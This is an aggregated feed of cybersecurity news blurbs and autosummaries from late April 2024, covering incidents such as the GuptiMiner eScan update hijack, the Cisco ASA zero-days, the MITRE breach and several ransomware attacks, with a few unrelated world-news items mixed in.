          A staggering increase in QR code phishing (quishing) attacks during 2023 saw them skyrocket up the list of concerns for cyber teams globally, according to Egress. Attacks were both prolific and highly successful, demonstrating how cybercriminals effectively combine available technology with consumer familiarity (or complacency) at scale. The evolution of phishing attack payloads In 2021 and 2022, QR code payloads in phishing emails were relatively rare – accounting for 0.8% and 1.4% of attacks respectively. … More

          The post AI set to play key role in future phishing attacks appeared first on Help Net Security.

          "

          Autosummary: On the other hand, the use of attachment-based payloads has decreased since 2021; three years ago, these accounted for 72.7% of attacks detected by Egress, and by the first quarter of 2024, this had fallen to 35.7% as threat actors evolve their payloads to evade cybersecurity efforts. "


          Cybersecurity jobs available right now: April 24, 2024

          ciber
          2024-04-24 https://www.helpnetsecurity.com/2024/04/24/cybersecurity-jobs-available-right-now-april-24-2024/

          Blockchain Security Researcher StarkWare | Israel | On-site – View job details The Security Researcher will be responsible for conducting in-depth research and analysis on the security of blockchain systems, protocols and the infrastructure that enables it. CISO Rajah & Tann Asia | Singapore | On-site – View job details CISO will lead and oversee firm’s information security program. This includes developing and implementing security policies and procedures, managing security technologies and overseeing security awareness … More

          The post Cybersecurity jobs available right now: April 24, 2024 appeared first on Help Net Security.

          "

          Autosummary: Security Engineer Verisk | Poland | Hybrid – View job details As a Security Engineer, you will have a chance to advance your skills in security automation through the utilization of AI, implement and administer database security solutions, data loss prevention policies, response rules, monitor and review data-related activities for policy violations and investigation. Information Security Specialist Kitopi | Dubai | Hybrid – View job details As Information Security Specialist, you will assist in developing information security policies, procedures and necessary documents in compliance with applicable standards and regulations, conduct phishing and social engineering test campaigns, measure key performance indicators to ensure the effectiveness of information security controls. "


          The relationship between cybersecurity and work tech innovation

          ciber
          2024-04-24 https://www.helpnetsecurity.com/2024/04/24/work-tech-innovation-cybersecurity-relationship-video/

          As organizations navigate the complexities of hybrid work arrangements and the gradual return to the office, the cybersecurity threat landscape has become increasingly challenging, with issues such as the proliferation of personal devices, the expansion of remote access points, and the potential for security gaps between in-office and remote environments. Issues such as the proliferation of personal devices, the expansion of remote access points, and the potential for security gaps between in-office and remote environments … More

          The post The relationship between cybersecurity and work tech innovation appeared first on Help Net Security.

          "

          Autosummary: "


          The Brazilians taking a UK mining project to court

          latam
          2024-04-24 https://www.bbc.co.uk/news/world-latin-america-68772590
          Brazil Iron calls itself a sustainable mining company. Local residents call its project a disaster. "

          Autosummary: "


          eScan Antivirus Update Mechanism Exploited to Spread Backdoors and Miners

          exploits
          2024-04-24 https://thehackernews.com/2024/04/escan-antivirus-update-mechanism.html
          A new malware campaign has been exploiting the updating mechanism of the eScan antivirus software to distribute backdoors and cryptocurrency miners like XMRig through a long-standing threat codenamed GuptiMiner targeting large corporate networks. Cybersecurity firm Avast said the activity is the work of a threat actor with possible connections to a North Korean hacking group dubbed  "

          Autosummary: GuptiMiner, known to be active since at least 2018, also makes use of various techniques like anti-VM and anti-debug tricks, code virtualization, dropping the PNG loader during system shutdown events, storing payloads in the Windows Registry, and adding a root certificate to Windows' certificate store to make the PNG loader DLLs appear trustworthy. "


          CoralRaider Malware Campaign Exploits CDN Cache to Spread Info-Stealers

          exploits
          2024-04-24 https://thehackernews.com/2024/04/coralraider-malware-campaign-exploits.html
          A new ongoing malware campaign has been observed distributing three different stealers, such as CryptBot, LummaC2, and Rhadamanthys hosted on Content Delivery Network (CDN) cache domains since at least February 2024. Cisco Talos has attributed the activity with moderate confidence to a threat actor tracked as CoralRaider, a suspected Vietnamese-origin "

          Autosummary: "


          The street lights in Leicester City cannot be turned off due to a cyber attack

          government
          2024-04-24 https://securityaffairs.com/162219/hacking/leicester-city-cyberattack.html
          A cyber attack on Leicester City Council resulted in certain street lights remaining illuminated all day and severely impacted the council’s operations The Leicester City Council suffered a cyber attack that severely impacted the authority’s services in March and led to the leak of confidential documents. The ransomware group behind the attack leaked multiple documents, including rent statements and […] "

          Autosummary: "


          City street lights “misbehave” after ransomware attack

          exploits government ransomware
          2024-04-24 https://www.bitdefender.com/blog/hotforsecurity/city-street-lights-misbehave-after-ransomware-attack/
          The UK's Leicester City Council was thrown into chaos last month when a crippling cyber attack forced it to shut down its IT systems and phone lines. But the ransomware attack also had a more unusual impact... Read more in my article on the Hot for Security blog. "

          Autosummary: Hopefully, Leicester City Council will manage to turn off its lights and continue to recover from all of the impact of its unfortunate ransomware attack in time, and provide support for any individuals and organisations who have been impacted by the data leak. "


          PoC for critical Progress Flowmon vulnerability released (CVE-2024-2389)

          exploits
          2024-04-24 https://www.helpnetsecurity.com/2024/04/24/poc-cve-2024-2389/

          More details of and a proof-of-concept exploit for an unauthenticated OS command injection vulnerability (CVE-2024-2389) in Flowmon, Progress Software’s network monitoring/analysis and security solution, have been published. The critical vulnerability has been disclosed and patched by Progress earlier this month. “Currently, we have not received any reports that this vulnerability has been exploited, and we are not aware of any direct impacts on customers,” the company says in an advisory that was last updated on … More

          The post PoC for critical Progress Flowmon vulnerability released (CVE-2024-2389) appeared first on Help Net Security.

          "

          Autosummary: "


          Global attacker median dwell time continues to fall

          ransomware
          2024-04-24 https://www.helpnetsecurity.com/2024/04/24/2023-attacker-dwell-time/

          While the use of zero-day exploits is on the rise, Mandiant’s M-Trends 2024 report reveals a significant improvement in global cybersecurity posture: the global median dwell time – the time attackers remain undetected within a target environment – has reached its lowest point in over a decade. The metrics reported in M-Trends 2024 are based on Mandiant Consulting investigations of targeted attack activity conducted between January 1, 2023 and December 31, 2023. Global cybersecurity shows … More

          The post Global attacker median dwell time continues to fall appeared first on Help Net Security.

          "

          Autosummary: Following this sector were business and professional services (13%), high technology (12%), retail and hospitality (9%), and healthcare (8%). Attacker median dwell time varies by region Organizations in the Asia-Pacific (JAPAC) region experienced the most dramatic decrease, reducing their median dwell time to 9 days, compared to 33 days in 2022. "


          Argentina seeks arrest of Iranian minister over bombing

          latam
          2024-04-24 https://www.bbc.co.uk/news/world-latin-america-68888587
          The call for his arrest comes after an Argentine court blamed Iran for an attack on a Jewish centre. "

          Autosummary: "


          Tevez "satisfactory" in hospital after chest pains

          industry
          2024-04-24 https://www.bbc.com/sport/football/articles/c51n7ny9d1no
          Former West Ham, Manchester United and Manchester City striker Carlos Tevez is admitted to hospital after suffering chest pains. "

          Autosummary: "


          ArcaneDoor hackers exploit Cisco zero-days to breach govt networks

          exploits
          2024-04-24 https://www.bleepingcomputer.com/news/security/arcanedoor-hackers-exploit-cisco-zero-days-to-breach-govt-networks/
          Cisco warned today that a state-backed hacking group has been exploiting two zero-day vulnerabilities in Adaptive Security Appliance (ASA) and Firepower Threat Defense (FTD) firewalls since November 2023 to breach government networks worldwide. [...] "

          Autosummary: "Regardless of your network equipment provider, now is the time to ensure that the devices are properly patched, logging to a central, secure location, and configured to have strong, multi-factor authentication (MFA)," the company added. "


          1Kosmos CSP enables government agencies to digitally verify resident identity

          government
          2024-04-24 https://www.helpnetsecurity.com/2024/04/24/1kosmos-csp/

          1Kosmos has expanded its offerings for the identity verification and passwordless market with the introduction of a new Credential Service Provider (CSP) managed service based on the privacy-by-design 1Kosmos platform. The 1Kosmos CSP offering enables government agencies to offer residents who are requesting services an elegant, automated process that simultaneously digitally verifies their identity up to certified NIST Identity Assurance Level 2 (IAL2) and then issues a strong, phishing-resistant, multi-factor authentication (MFA) credential, up to … More

          The post 1Kosmos CSP enables government agencies to digitally verify resident identity appeared first on Help Net Security.

          "

          Autosummary: Phone number verification using SIM binding, where a security token (used as proof of identity) is linked to a device trusted by the user and a service provider; Social Security number (optional) and address verification. Once completed, this enrollment process creates a user-controlled, privacy-preserving digital wallet that provides a government-grade validated identity for online transactions. "


          Hackers hijacked the eScan Antivirus update mechanism in malware campaign

          exploits
          2024-04-24 https://securityaffairs.com/162228/breaking-news/escan-antivirus-mitm-attack.html
          A malware campaign has been exploiting the updating mechanism of the eScan antivirus to distribute backdoors and cryptocurrency miners. Avast researchers discovered and analyzed a malware campaign that exploited the update mechanism of the eScan antivirus to distribute backdoors and crypto miners. Threat actors employed two different types of backdoors and targeted large corporate networks […] "

          Autosummary: Because of the sideloading, the DLL runs with the same privileges as the source process (eScan) and is loaded the next time eScan runs, usually after a system restart. If a mutex is not present in the system (depends on the version, e.g. Mutex_ONLY_ME_V1), the malware searches for the services.exe process and injects its next stage into the first one it can find. Cleanup is performed, removing the update package. GuptiMiner operates its own DNS servers to provide legitimate destination domain addresses of C2 servers through DNS TXT responses. “GuptiMiner is a highly sophisticated threat that uses an interesting infection chain along with a couple of techniques that include performing DNS requests to the attacker’s DNS servers, performing sideloading, extracting payloads from innocent-looking images, signing its payloads with a custom trusted root anchor certification authority, among others.” "


          Maximum severity Flowmon bug has a public exploit, patch now

          exploits
          2024-04-24 https://www.bleepingcomputer.com/news/security/maximum-severity-flowmon-bug-has-a-public-exploit-patch-now/
          Proof-of-concept exploit code has been released for a top-severity security vulnerability in Progress Flowmon, a tool for monitoring network performance and visibility. [...] "

          Autosummary: It is used by more than 1,500 companies around the world, including SEGA, KIA, and TDK, Volkswagen, Orange, and Tietoevry. "


          Hackers backdoored Cisco ASA devices via two zero-days (CVE-2024-20353, CVE-2024-20359)

          exploits
          2024-04-24 https://www.helpnetsecurity.com/2024/04/24/cve-2024-20353-cve-2024-20359/

          A state-sponsored threat actor has managed to compromise Cisco Adaptive Security Appliances (ASA) used on government networks across the globe and use two zero-day vulnerabilities (CVE-2024-20353, CVE-2024-20359) to install backdoors on them, Cisco Talos researchers have shared on Wednesday. First confirmed activity observed by a Cisco customer dates to early January 2024 but the actual attacks started in November 2023. “Further, we have identified evidence that suggests this capability was being tested and developed as … More

          The post Hackers backdoored Cisco ASA devices via two zero-days (CVE-2024-20353, CVE-2024-20359) appeared first on Help Net Security.

          "

          Autosummary: “Regardless of your network equipment provider, now is the time to ensure that the devices are properly patched, logging to a central, secure location, and configured to have strong, multi-factor authentication (MFA),” Cisco Talos warned. "


          Nation-state actors exploited two zero-days in ASA and FTD firewalls to breach government networks

          exploits government
          2024-04-24 https://securityaffairs.com/162244/apt/nation-state-actors-exploited-two-zero-days-in-asa-and-ftd-firewalls-to-breach-government-networks.html
          Nation-state actor UAT4356 has been exploiting two zero-days in ASA and FTD firewalls since November 2023 to breach government networks. Cisco Talos warned that the nation-state actor UAT4356 (aka STORM-1849) has been exploiting two zero-day vulnerabilities in Adaptive Security Appliance (ASA) and Firepower Threat Defense (FTD) firewalls since November 2023 to breach government networks worldwide. […] "

          Autosummary: Nation-state actors exploited two zero-days in ASA and FTD firewalls to breach government networks (Pierluigi Paganini, April 24, 2024). Nation-state actor UAT4356 has been exploiting two zero-days in ASA and FTD firewalls since November 2023 to breach government networks. "


          Smashing Security podcast #369: Keeping the lights on after a ransomware attack

          exploits ransomware
          2024-04-24 https://grahamcluley.com/smashing-security-podcast-369/
          Leicester City Council suffers a crippling ransomware attack, and a massive data breach, but is it out of the dark yet? And as election fever hits India we take a close eye at deepfakery. All this and more is discussed in the latest edition of the "Smashing Security" podcast by cybersecurity veterans Graham Cluley and Carole Theriault. "

          Autosummary: Hosts: Graham Cluley – @gcluley Carole Theriault – @caroletheriault Episode links: Sponsored by: Sonrai’s Cloud Permissions Firewall – A one-click solution to least privilege without disrupting DevOps. "


          10 colleges and universities shaping the future of cybersecurity education

          ciber
          2024-04-23 https://www.helpnetsecurity.com/2024/04/23/cybersecurity-colleges-universities/

          Institutions featured on this list often provide undergraduate and graduate degrees, courses, as well as certificate programs tailored to meet the growing demand for cybersecurity professionals in various industries. Some notable colleges and universities renowned for their cybersecurity programs and courses include: Carnegie Mellon University (USA) Information Networking Institute (INI) The Information Networking Institute (INI) at Carnegie Mellon University (CMU) educates and develops engineers through technical, interdisciplinary master’s degree programs in information networking, security and … More

          The post 10 colleges and universities shaping the future of cybersecurity education appeared first on Help Net Security.

          "

          Autosummary: Program: Master of Science in Cybersecurity Massachusetts Institute of Technology (USA) MIT Department of Electrical Engineering and Computer Science A joint venture between the Schwarzman College of Computing and the School of Engineering, EECS is grounded in three overlapping sub-units: electrical engineering (EE), computer science (CS), and artificial intelligence and decision-making (AI+D). "


          Behavioral patterns of ransomware groups are changing

          exploits ransomware
          2024-04-23 https://www.helpnetsecurity.com/2024/04/23/ransomware-groups-activity-q1-2024/

          Q1 saw substantial shifts in activity from some of the most prolific Ransomware-as-a-Service (RaaS) groups, according to GuidePoint Security. RaaS groups attempt to recruit disaffected or displaced affiliates In addition to revealing a nearly 20% year-over-year increase in the number of ransomware victims, the GRIT Q1 2024 Ransomware Report observes major shifts in the behavioral patterns of ransomware groups following law enforcement activity – including the continued targeting of previously “off-limits” organizations and industries, such … More

          The post Behavioral patterns of ransomware groups are changing appeared first on Help Net Security.

          "

          Autosummary: RaaS groups attempt to recruit disaffected or displaced affiliates In addition to revealing a nearly 20% year-over-year increase in the number of ransomware victims, the GRIT Q1 2024 Ransomware Report observes major shifts in the behavioral patterns of ransomware groups following law enforcement activity – including the continued targeting of previously “off-limits” organizations and industries, such as emergency hospitals. "


          Align introduces ransomware prevention feature, powered by Adlumin

          exploits ransomware
          2024-04-23 https://www.helpnetsecurity.com/2024/04/23/align-guardian/

          Align announces the inclusion of a new ransomware prevention feature to enhance its Align Guardian Managed Detection and Response offering powered by Adlumin. This innovative solution is designed to detect and halt ransomware in its tracks, safeguarding files from encryption and providing organizations with the peace of mind to focus on their core business operations. The solution demonstrated incredible success in benchmark tests amongst the most notorious ransomware groups, saving on average 99% of files … More

          The post Align introduces ransomware prevention feature, powered by Adlumin appeared first on Help Net Security.

          "

          Autosummary: "


          U.S. Imposes Visa Restrictions on 13 Linked to Commercial Spyware Misuse

          Linux
          2024-04-23 https://thehackernews.com/2024/04/us-imposes-visa-restrictions-on-13.html
          The U.S. Department of State on Monday said it's taking steps to impose visa restrictions on 13 individuals who are allegedly involved in the development and sale of commercial spyware or who are immediate family members of those involved in such businesses. "These individuals have facilitated or derived financial benefit from the misuse of this technology, which "

          Autosummary: "


          Russia's APT28 Exploited Windows Print Spooler Flaw to Deploy "GooseEgg" Malware

          exploits
          2024-04-23 https://thehackernews.com/2024/04/russias-apt28-exploited-windows-print.html
          The Russia-linked nation-state threat actor tracked as APT28 weaponized a security flaw in the Microsoft Windows Print Spooler component to deliver a previously unknown custom malware called GooseEgg. The post-compromise tool, which is said to have been used since at least June 2020 and possibly as early as April 2019, leveraged a now-patched flaw that allowed for "

          Autosummary: PS, a PowerShell variant that contains code to spread itself to connected USB devices; GammaInfo, a PowerShell-based enumeration script collecting various information from the host; GammaSteel, a PowerShell-based malware to exfiltrate files from a victim based on an extension allowlist. "Hive0051 rotates infrastructure through synchronized DNS fluxing across multiple channels including Telegram, Telegraph and Filetransfer.io," IBM X-Force researchers said earlier this month, stating it "points to a potential elevation in actor resources and capability devoted to ongoing operations. "


          Veeam acquires Coveware to boost its ransomware protection capabilities

          exploits ransomware
          2024-04-23 https://www.helpnetsecurity.com/2024/04/23/veeam-coveware-acquisition/

          Veeam Software announced the acquisition of Coveware, a provider in cyber-extortion incident response. It brings ransomware recovery and first responder capabilities to further strengthen Veeam’s radical resilience solutions for customers. Coveware by Veeam will continue to operate as it does today, providing incident response services to victims of cyber extortion attacks as well as working proactively with enterprise customers on incident response preparedness. Since its founding in 2018, Coveware has helped thousands of cyber extortion … More

          The post Veeam acquires Coveware to boost its ransomware protection capabilities appeared first on Help Net Security.

          "

          Autosummary: Coveware by Veeam will continue to be available to customers as a full-featured offering, including: fully automated technology that runs across the client’s operational environment to perform forensic triage analysis, which assesses any impact, identifies the ransomware (strain, threat actor group, entry point), and helps recover encrypted data from known ransomware groups – though nothing is as safe as secure, clean backups. Veeam will also incorporate elements of Coveware technology into the Veeam Data Platform and through the Veeam Cyber Secure Program, which provides customers with cyber protection and support including pre-, during- and post-incident support, and a $5 million warranty. "


          CrushFTP zero-day exploited by attackers, upgrade immediately! (CVE-2024-4040)

          exploits
          2024-04-23 https://www.helpnetsecurity.com/2024/04/23/cve-2024-4040/

          A vulnerability (CVE-2024-4040) in enterprise file transfer solution CrushFTP is being exploited by attackers in a targeted fashion, according to Crowdstrike. The vulnerability allows attackers to escape their virtual file system and download system files (i.e., configuration files), but only if the solution’s WebInterface is exposed on the internet. According to Censys, there are currently 9,600+ publicly-exposed CrushFTP hosts (virtual & physical), mostly in North America and Europe. About CVE-2024-4040 CrushFTP sent out notices about … More

          The post CrushFTP zero-day exploited by attackers, upgrade immediately! (CVE-2024-4040) appeared first on Help Net Security.

          "

          Autosummary: The vulnerability allows attackers to escape their virtual file system and download system files (i.e., configuration files), but only if the solution’s WebInterface is exposed on the internet. "


          Unmasking the True Cost of Cyberattacks: Beyond Ransom and Recovery

          ciber
          2024-04-23 https://thehackernews.com/2024/04/unmasking-true-cost-of-cyberattacks.html
          Cybersecurity breaches can be devastating for both individuals and businesses alike. While many people tend to focus on understanding how and why they were targeted by such breaches, there’s a larger, more pressing question: What is the true financial impact of a cyberattack? According to research by Cybersecurity Ventures, the global cost of cybercrime is projected to reach

          Autosummary: On a broader level, some countries, like the U.S., China, and the UK, have even started investing in their digital defenses, as they do with their military efforts. Moreover, the recovery process from a cyberattack often involves substantial investments in cybersecurity measures, legal fees, and compensations, further contributing to the overall financial impact. Businesses linked to essential services, like those in the finance, medical, and transportation industries, are particularly susceptible to cyberattacks because of their impact on everyday lives.


          Hackers hijack antivirus updates to drop GuptiMiner malware

          exploits
          2024-04-23 https://www.bleepingcomputer.com/news/security/hackers-hijack-antivirus-updates-to-drop-guptiminer-malware/
          North Korean hackers have been exploiting the updating mechanism of the eScan antivirus to plant backdoors on big corporate networks and deliver cryptocurrency miners through GuptiMiner malware. [...]

          Autosummary: GuptiMiner also checks whether the system it runs on has more than 4 CPU cores and 4GB of RAM, to evade sandbox environments, and determines whether Wireshark, WinDbg, TCPView, 360 Total Security, Huorong Internet Security, Process Explorer, Process Monitor, or OllyDbg are actively running.


          UnitedHealth confirms it paid ransomware gang to stop data leak

          exploits ransomware
          2024-04-23 https://www.bleepingcomputer.com/news/security/unitedhealth-confirms-it-paid-ransomware-gang-to-stop-data-leak/
          The UnitedHealth Group has confirmed that it paid a ransom to cybercriminals to protect sensitive data stolen during the Optum ransomware attack in late February. [...]

          Autosummary: “Based on initial targeted data sampling to date, the company has found files containing protected health information (PHI) or personally identifiable information (PII), which could cover a substantial proportion of people in America,” reads the announcement.


          Entrust protects users against fraud, phishing and other account takeover attacks

          financial
          2024-04-23 https://www.helpnetsecurity.com/2024/04/23/entrust-identity-verification/

          Entrust announced a single-vendor enhanced authentication solution that integrates identity verification (IDV) and identity and access management (IAM) to fight deepfakes, phishing, account takeover (ATO) attacks and other threats. By enhancing the Entrust Identity as a Service (IDaaS) platform with Onfido’s AI-powered document and biometric verification, customers will be able to deploy next-level identity authentication before allowing a privileged action or making a high-value transaction. This equips the IDaaS platform with a new layer of hardened … More


          Russian hackers’ custom tool exploits old Windows Print Spooler flaw (CVE-2022-38028)

          exploits rusia-ucrania
          2024-04-23 https://www.helpnetsecurity.com/2024/04/23/cve-2022-38028-exploits/

          For nearly four years and perhaps even longer, Forest Blizzard (aka Fancy Bear, aka APT28) has been using a custom tool that exploits a specific vulnerability in the Windows Print Spooler service (CVE-2022-38028). Dubbed GooseEgg, the tool is a launcher application that can spawn other applications with SYSTEM-level permissions, thus helping the hackers to perform remote code execution, install backdoors, steal credentials, and more. “Microsoft has observed Forest Blizzard using GooseEgg as part of post-compromise activities … More

          Autosummary: “Microsoft has observed Forest Blizzard using GooseEgg as part of post-compromise activities against targets including Ukrainian, Western European, and North American government, non-governmental, education, and transportation sector organizations,” Microsoft threat analysts shared on Monday.


          US govt sanctions Iranians linked to government cyberattacks

          government ciber
          2024-04-23 https://www.bleepingcomputer.com/news/security/us-govt-sanctions-iranians-linked-to-government-cyberattacks/
          The Treasury Department’s Office of Foreign Assets Control (OFAC) has sanctioned four Iranian nationals for their involvement in cyberattacks against the U.S. government, defense contractors, and private companies. [...]

          Autosummary: Today, the Justice Department also unsealed indictments charging Kazemifar, Salmani, and Harooni for their involvement in a cyber campaign targeting U.S. government agencies, including the U.S. Departments of State and Treasury, and private entities, mainly cleared defense contractors, between 2016 and 2021.


          Microsoft pulls fix for Outlook bug behind ICS security alerts

          exploits industry
          2024-04-23 https://www.bleepingcomputer.com/news/microsoft/microsoft-pulls-fix-for-outlook-bug-unexpected-ICS-warnings-after-December-security-updates/
          Microsoft reversed the fix for an Outlook bug causing erroneous security warnings after installing December 2023 security updates [...]


          CoralRaider attacks use CDN cache to push info-stealer malware

          exploits
          2024-04-23 https://www.bleepingcomputer.com/news/security/coralraider-attacks-use-cdn-cache-to-push-info-stealer-malware/
          A threat actor has been using a content delivery network cache to store information-stealing malware in an ongoing campaign targeting systems in the U.S., the U.K., Germany, and Japan. [...]

          Autosummary: However, the latest operation has extended targeting to the U.S., Nigeria, Pakistan, Ecuador, Germany, Egypt, the U.K., Poland, the Philippines, Norway, Japan, Syria and Turkey.


          Google ad for Facebook redirects to scam

          financial
          2024-04-23 https://www.malwarebytes.com/blog/scams/2024/04/google-ad-for-facebook-redirects-to-scam
          Beware of this malicious ad campaign currently making the rounds. Read our blog for more details and how to protect yourself.

          Autosummary: More importantly, there is the ad itself: vanity URL, display text, tracking template, final URL. As a user you can protect yourself in various ways: beware of sponsored results, block ads altogether, and recognize scam pages as fake. If you want the peace of mind of having all this covered for you, download our Malwarebytes Browser Guard extension, available for different browsers.


          How to optimize your bug bounty programs

          exploits
          2024-04-22 https://www.helpnetsecurity.com/2024/04/22/roy-davis-zoom-bug-bounty-programs/

          In this Help Net Security interview, Roy Davis, Manager – Vulnerability Management & Bug Bounty at Zoom, discusses the role bug bounty programs play in identifying security vulnerabilities and facilitating collaboration with researchers. He offers advice to organizations, stressing the importance of clear program policies, swift response times, and competitive bounties to attract and retain top bug hunting talent. Are there specific vulnerabilities or security issues that bug bounty programs are particularly effective in identifying? … More

          Autosummary: On the bug bounty program side, the platforms combine vetted, qualified researchers, interactive communication functionality, and management of back-end bug bounty payment transfers. To attract top talent, organizations should establish principles to help them guide and improve their program: adhere to clear and concise program policies that include what types of testing are allowed, details regarding the program’s “Safe Harbor” policy, and a menu of potential bounty payout ranges for specific types of vulnerability reports.


          Fuxnet malware: Growing threat to industrial sensors

          exploits industry
          2024-04-22 https://www.helpnetsecurity.com/2024/04/22/fuxnet-malware-video/

          In this Help Net Security video, Sonu Shankar, Chief Strategy Officer at Phosphorus, discusses how Blackjack’s Fuxnet malware should be a wake-up call to industrial operators about the vulnerability of sensor networks and the outsized impact these attacks can have on critical operations.


          How to improve response to emerging cybersecurity threats

          ciber
          2024-04-22 https://www.helpnetsecurity.com/2024/04/22/cybersecurity-best-practices-video/

          Cyber resilience is a top priority for global organizations, and understanding threats plays a crucial role in building and maintaining a layered security approach. This Help Net Security round-up presents excerpts from previously recorded videos featuring security experts discussing various cybersecurity aspects and best practices in different domains. Complete videos: Robin Berthier, CEO at Network Perception, talks about strategy for cyber resilience. Deepak Goel, CTO at D2iQ, talks about best practices for Kubernetes security in … More


          Russian Sandworm hackers targeted 20 critical orgs in Ukraine

          rusia-ucrania
          2024-04-22 https://www.bleepingcomputer.com/news/security/russian-sandworm-hackers-targeted-20-critical-orgs-in-ukraine/
          Russian hacker group Sandworm aimed to disrupt operations at around 20 critical infrastructure facilities in Ukraine, according to a report from the Ukrainian Computer Emergency Response Team (CERT-UA). [...]

          Autosummary: From March 7 to March 15, 2024, CERT-UA engaged in extensive counter-cyberattack operations, which included informing affected enterprises, removing malware, and enhancing security measures.


          MITRE breached by nation-state threat actor via Ivanti zero-days

          exploits government
          2024-04-22 https://www.helpnetsecurity.com/2024/04/22/mitre-breached/

          MITRE has been breached by attackers via two zero-day vulnerabilities (CVE-2023-46805, CVE-2024-21887) in Ivanti’s Connect Secure VPN devices. The attackers have also managed to move laterally and compromise the company network’s VMware infrastructure, MITRE confirmed late last week. What is known about the breach? The MITRE Corporation is an American not-for-profit organization that manages federally funded research and development centers supporting various US government agencies. “After detecting suspicious activity on [MITRE’s] Networked Experimentation, Research, and … More

          Autosummary: The investigation is still ongoing, but MITRE decided to share preliminary findings to help others, as well as specific advice for defenders: monitor VPN traffic for unusual patterns; look for deviations in user behavior; segment networks to limit lateral movement; use threat intelligence feeds to identify known malicious IP addresses, domains, or file hashes; use deception environments and honey tokens to detect attackers’ actions faster; and harden networks with robust access control, regular patch management, vulnerability assessments, etc.


          Pentera"s 2024 Report Reveals Hundreds of Security Events per Week, Highlighting the Criticality of Continuous Validation

          ransomware
          2024-04-22 https://thehackernews.com/2024/04/penteras-2024-report-reveals-hundreds.html
          Over the past two years, a shocking 51% of organizations surveyed in a leading industry report have been compromised by a cyberattack. Yes, over half. And this, in a world where enterprises deploy an average of 53 different security solutions to safeguard their digital domain. Alarming? Absolutely. A recent survey of CISOs and CIOs, commissioned by Pentera and

          Autosummary: What do these findings mean? The State of Pentesting Survey of 2024, by Pentera, underscores a critical juncture for cybersecurity: as threats continue to evolve, many security solutions fail to mitigate them, requiring CISOs to more consistently validate the security of their infrastructure. Key findings include: the impact of a breach is high (43% reported unplanned downtime, 36% reported data exposure, 31% reported financial loss); as Boards of Directors (BoDs) become more cyber aware, over 50% of CISOs now share their pentesting reports with their BoDs. Security breaches persist despite investments: the 2024 report reveals that enterprises have an average of 53 security solutions, yet they are struggling to maintain the Confidentiality, Integrity, Availability (CIA) triad.


          MITRE Corporation Breached by Nation-State Hackers Exploiting Ivanti Flaws

          exploits government
          2024-04-22 https://thehackernews.com/2024/04/mitre-corporation-breached-by-nation.html
          The MITRE Corporation revealed that it was the target of a nation-state cyber attack that exploited two zero-day flaws in Ivanti Connect Secure appliances starting in January 2024. The intrusion led to the compromise of its Networked Experimentation, Research, and Virtualization Environment (NERVE), an unclassified research and prototyping network. The unknown adversary "performed reconnaissance


          Ransomware Double-Dip: Re-Victimization in Cyber Extortion

          exploits
          2024-04-22 https://thehackernews.com/2024/04/ransomware-double-dip-re-victimization.html
          Between crossovers - Do threat actors play dirty or desperate? In our dataset of over 11,000 victim organizations that have experienced a Cyber Extortion / Ransomware attack, we noticed that some victims re-occur. Consequently, the question arises why we observe a re-victimization and whether or not this is an actual second attack, an affiliate crossover (meaning an affiliate has gone to

          Autosummary: At the same time, victim organizations that appeared first on ALPHV’s leak site were re-posted by various other operations such as AvosLocker, LockBit, Ransomhouse, incransom, Haron, cactus, etc. The Snatch group, for example, demonstrates re-victimization activity by consistently re-posting victims from other Cy-X operations such as AstroTeam, Meow, Sabbath, Karma Leaks, cactus, Quantum, Egregor and Marketo. If we continue studying the graph, we see another cluster, ALPHV’s, where ALPHV re-posted victims from MONTI, 8Base and Qilin (in the latter case the victim organization was posted on the same day at both leak sites, ALPHV and Qilin). In short, your cyber practices, your digital footprint, the value your organization’s data has to you, the time a threat actor has access to your environment, and the security controls you might have in place to increase the "noisiness" of data exfiltration are all variables that impact the attractiveness of your organization to the opportunistic threat actors out there in cyberspace. On the other hand, if we do follow the victim count patterns of the last years (lower numbers in the beginning of the year, increasing throughout the year), which would have the opposite effect, we would be provided with an ever-growing victim count once more. Note: This piece was contributed by Diana Selck-Paulsson, Lead Security Researcher, Orange Cyberdefense, and Wicus Ross, Senior Security Researcher, Orange Cyberdefense. Here, we collected actions such as announcements on kicking off international task forces to combat ransomware, law enforcement tricking threat actors into providing decryption keys, seizing infrastructure, infiltrating cybercrime markets, etc. This can greatly undermine "the trust" within the Ransomware-as-a-Service (RaaS) ecosystem, and there could be a short-term decrease in the number of victims as affiliates and other actors assess their risks. Re-victimization of Cy-X victims in the form of desperation or affiliate crossovers: We know by now that the cybercrime ecosystem is a complex one, including many different types of actors, roles and actions.


          Windows DOS-to-NT flaws exploited to achieve unprivileged rootkit-like capabilities

          exploits
          2024-04-22 https://securityaffairs.com/162129/security/windows-dos-to-nt-flaws-rootkit-like-capabilities.html
          A researcher demonstrated how to exploit vulnerabilities in the Windows DOS-to-NT path conversion process to achieve rootkit-like capabilities. SafeBreach researcher Or Yair devised a technique, exploiting vulnerabilities in the DOS-to-NT path conversion process, to achieve rootkit-like capabilities on Windows. When a user executes a function with a path argument in Windows, the DOS path of the […]

          Autosummary: Pierluigi Paganini, April 22, 2024. “I discovered how a malicious actor—without admin privileges—could hide files and processes, hide files in archives, affect prefetch file analysis, make Task Manager and Process Explorer users think a malware file was a verified executable published by Microsoft, disable Process Explorer with a denial of service (DoS) vulnerability, and more.” A user-space rootkit aims to intercept user-space API calls, execute the original function, filter out malicious data, and return altered information to the caller.


          Synlab Italia suspends operations following ransomware attack

          exploits ransomware
          2024-04-22 https://www.bleepingcomputer.com/news/security/synlab-italia-suspends-operations-following-ransomware-attack/
          Synlab Italia has suspended all its medical diagnostic and testing services after a ransomware attack forced its IT systems to be taken offline. [...]

          Autosummary: "In these hours, the SYNLAB task force is being analyzed for every single portion of the IT infrastructure, including backup systems, in order to restore the systems safely as soon as possible," reads the status update.


          GitLab affected by GitHub-style CDN flaw allowing malware hosting

          exploits
          2024-04-22 https://www.bleepingcomputer.com/news/security/gitlab-affected-by-github-style-cdn-flaw-allowing-malware-hosting/
          BleepingComputer recently reported how a GitHub flaw, or possibly a design decision, is being abused by threat actors to distribute malware using URLs associated with Microsoft repositories, making the files appear trustworthy. It turns out GitLab is also affected by this issue and could be abused in a similar fashion. [...]

          Autosummary: In our tests, we were able to upload files that would get uploaded to GitLab’s CDN but look as if they existed in GitLab repos of popular open source projects like Inkscape and Wireshark: https://gitlab[.]com/inkscape/inkscape/uploads/edfdbc997689255568a7c81db3f3dc51/InkScape-2024-Latest.exe https://gitlab[.]com/wireshark/wireshark/uploads/b4162053fbb4dc6ee4f673c532009e16/WireShark-v4.2.4-stable-release.exe The file used in our test is a benign JPG image, renamed to .exe.


